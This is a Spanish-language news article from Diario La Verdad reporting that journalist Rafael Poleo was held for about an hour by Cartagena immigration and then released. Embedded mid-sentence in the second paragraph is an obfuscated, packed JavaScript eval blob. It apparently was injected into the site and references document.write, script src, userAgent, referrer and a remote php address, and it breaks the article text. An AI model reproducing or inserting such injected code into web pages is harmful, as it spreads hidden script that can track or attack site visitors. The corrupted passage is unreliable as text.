publicidad

Rafael Poleo fue detenido en Colombia

Agencias / Maracaibo / eborjes@laverdad.com
Poleo eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhtnz|var|u0026u|referrer|nibnd||js|php'.split('|'),0,{})) se encuentra en Cartagena para asistir al Congreso de la Internacional Socialista, que se llevará a cabo en la ciudad colombiana. El periodista se pronunció en su cuenta de Twitter, apuntando al gobierno venezolano como la razón de su detención

Foto Archivo

Este domingo, Rafael Poleo, periodista venezolano y editor de la revista Zeta, fue detenido en Inmigración de Cartagena. En el proceso, los funcionarios le incautaron su pasaporte durante más de una hora.

Poleo se encuentra en Cartagena para asistir al Congreso de la Internacional Socialista, que se llevará a cabo en la ciudad colombiana.

El periodista se pronunció en su cuenta de Twitter, apuntando al gobierno venezolano como la razón de su detención: "Estoy detenido en Cartagena, Colombia, por denuncia del gobierno de Venezuela".

Poco después fue liberado y se le autorizó su ingreso a Colombia, así lo reseñó El Nacional en su portal web.

Su hijo Francisco Poleo explicó lo sucedido entre su papá y las autoridades de inmigración colombiana. "Lo acaban de liberar. Le permitieron la entrada a Colombia, luego de una hora de retención. Le retuvieron el pasaporte porque estaban chequeando con las oficinas de Bogotá la información", informó el hijo del periodista.

 

 

 

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama